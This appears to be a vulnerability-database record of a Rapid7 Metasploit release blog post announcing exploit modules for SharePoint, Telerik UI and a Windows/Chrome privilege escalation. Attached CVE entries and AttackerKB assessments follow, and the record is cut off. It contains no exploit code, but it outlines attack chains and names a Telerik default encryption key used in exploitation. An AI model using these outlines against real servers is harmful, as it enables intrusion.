ID RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D Type rapid7blog Reporter Jeffrey Martin Modified 2020-10-23T18:56:55
Description
Metasploit keeping that developer awareness rate up.
Thanks to mr_me & wvu, SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the server's config, making that report oh so much more fun.
Like to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by timwr and friends through Chrome, this module might be that push you need to get out onto solid ground.
More improved doc and syntax by h00die adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!
Add tab completion for run command by cgranleese-r7 adds tab completion for specifying inline options when using the run command. For example, within Metasploit's console, typing run and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be suggested; for example, typing run LHOST= and then hitting the tab key twice will show all available LHOST values.
CVE-2019-1458 chrome sandbox escape by timwr adds support for exploiting CVE-2019-1458, aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the exploit/multi/browser/chrome_object_create.rb module that exploits CVE-2018-17463 in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
{"id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Wrap-Up", "description": "\n\nMetasploit keeping that developer awareness rate up.\n\n\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits 
[CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. 
Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. 
As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2020-10-23T18:56:55", "modified": "2020-10-23T18:56:55", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "reporter": "Jeffrey Martin", "references": [], "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "lastseen": "2020-10-28T04:47:53", "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-18935", "CVE-2020-16952", "CVE-2018-17463", "CVE-2019-1458", "CVE-2020-16875"]}, {"type": "attackerkb", "idList": ["AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "hackerone", "idList": ["H1:913695", "H1:838196"]}, {"type": "symantec", "idList": ["SMNTC-111060"]}, {"type": "securelist", "idList": ["SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "SECURELIST:4F6413DE862444B5FA0B192AF22A042D"]}, {"type": "cisa", "idList": ["CISA:48962A3B37B032DCF622B3E3135B8A1A"]}, {"type": "mscve", "idList": ["MS:CVE-2019-1458", "MS:CVE-2020-16952", "MS:CVE-2020-16875"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612", "PACKETSTORM:156651", "PACKETSTORM:159569", "PACKETSTORM:159210", "PACKETSTORM:156640", "PACKETSTORM:159653"]}, {"type": "threatpost", "idList": ["THREATPOST:230DF95E70EB9C4F372C198798822D19", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", 
"THREATPOST:8A816F536308CF8DB9594CD95292E06E", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57", "THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "THREATPOST:02914A68EEB34D94544D5D00BF463BAC"]}, {"type": "zdt", "idList": ["1337DAY-ID-34054", "1337DAY-ID-33683", "1337DAY-ID-34066"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B"]}, {"type": "exploitdb", "idList": ["EDB-ID:47793", "EDB-ID:48184", "EDB-ID:48180"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE/", "MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE", "MSF:EXPLOIT/WINDOWS/HTTP/TELERIK_RAU_DESERIALIZATION/", "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2019_1458_WIZARDOPIUM/"]}, {"type": "nessus", "idList": ["TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS19_DEC_4530702.NASL", "SMB_NT_MS19_DEC_4530681.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS19_DEC_4530734.NASL", "SMB_NT_MS19_DEC_4530695.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_SEP_EXCHANGE.NASL", "SMB_NT_MS19_DEC_4530691.NASL"]}, {"type": "mskb", "idList": ["KB4486676", "KB4486677", "KB4577352", "KB4486694"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:69F5E155188CF28043839A251912213A", "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3", "QUALYSBLOG:D1C46696E4E69F5182E6FECCD3884846"]}, {"type": "thn", "idList": ["THN:592EF1422E531E5A7AD2804EA7E024CD", "THN:CDB4261BBCF3D5E2CC872D65E155CC0E"]}, {"type": "krebs", "idList": ["KREBS:537C1540357C1E3360A8168D22F44CB5", "KREBS:B3F20C0C41C613971FDADBAE93382CDF", "KREBS:DF8493DA16F49CE6247436830678BA8D", "KREBS:613A537780BD40A6F8E0047CE8D3E6EC"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", 
"RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A"]}, {"type": "myhack58", "idList": ["MYHACK58:62201996030"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC", "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814094", "OPENVAS:1361412562310814095", "OPENVAS:1361412562310704330", "OPENVAS:1361412562310814096", "OPENVAS:1361412562310851995", "OPENVAS:1361412562310815862", "OPENVAS:1361412562310815737", "OPENVAS:1361412562310815735", "OPENVAS:1361412562310851948", "OPENVAS:1361412562310815867"]}, {"type": "kaspersky", "idList": ["KLA11862"]}, {"type": "archlinux", "idList": ["ASA-201810-12"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4330-1:C6D67"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3273-1"]}], "modified": "2020-10-28T04:47:53", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-10-28T04:47:53", "rev": 2}, "vulnersScore": 7.4}}
{"cve": [{"lastseen": "2020-10-22T10:49:04", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "title": "CVE-2020-16952", "type": "cve", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-21T16:07:00", "cpe": ["cpe:/a:microsoft:sharepoint_foundation:2013", "cpe:/a:microsoft:sharepoint_server:2019", "cpe:/a:microsoft:sharepoint_enterprise_server:2016"], "id": "CVE-2020-16952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*"]}, {"lastseen": 
"2020-12-09T20:25:38", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "edition": 16, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-14T15:29:00", "title": "CVE-2018-17463", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:redhat:linux_server:6.0", "cpe:/o:redhat:linux_workstation:6.0", "cpe:/o:redhat:linux_desktop:6.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-17463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_server:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T21:41:48", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 
contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-11T13:15:00", "title": "CVE-2019-18935", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2020-10-20T22:15:00", "cpe": [], "id": "CVE-2019-18935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-10-03T12:55:52", "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the 
System user, aka 'Microsoft Exchange Server Remote Code Execution Vulnerability'.", "edition": 3, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-11T17:15:00", "title": "CVE-2020-16875", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16875"], "modified": "2020-09-17T16:15:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2020-16875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16875", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_6:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_5:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_17:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_16:*:*:*:*:*:*"]}, {"lastseen": "2020-10-16T12:04:25", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege 
Vulnerability'.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "title": "CVE-2019-1458", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T21:15:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2019-1458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:36:26", "bulletinFamily": "info", "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 05, 2020 6:37pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. 
With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 4**ccondon-r7** at October 13, 2020 4:47pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. 
At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**gwillcox-r7** at October 20, 2020 6:59pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. 
Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n", "modified": "2020-06-05T00:00:00", "published": "2019-12-11T00:00:00", "id": "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "href": "https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935", "type": "attackerkb", "title": "CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-15T21:14:39", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-168750", "CVE-2020-17132"], "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka \u2018Microsoft Exchange Server Remote Code Execution Vulnerability\u2019. **Note:** As of January 12, 2021, the patch for CVE-2020-16875 has been bypassed twice. See [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132#rapid7-analysis>) for details.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at September 09, 2020 6:14pm UTC reported:\n\nThere\u2019s more info in Rapid7\u2019s analysis [here](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?#rapid7-analysis>), but as **@tsellers-r7** and **@smcintyre-r7** pointed out privately today, need for authenticated session + exposed 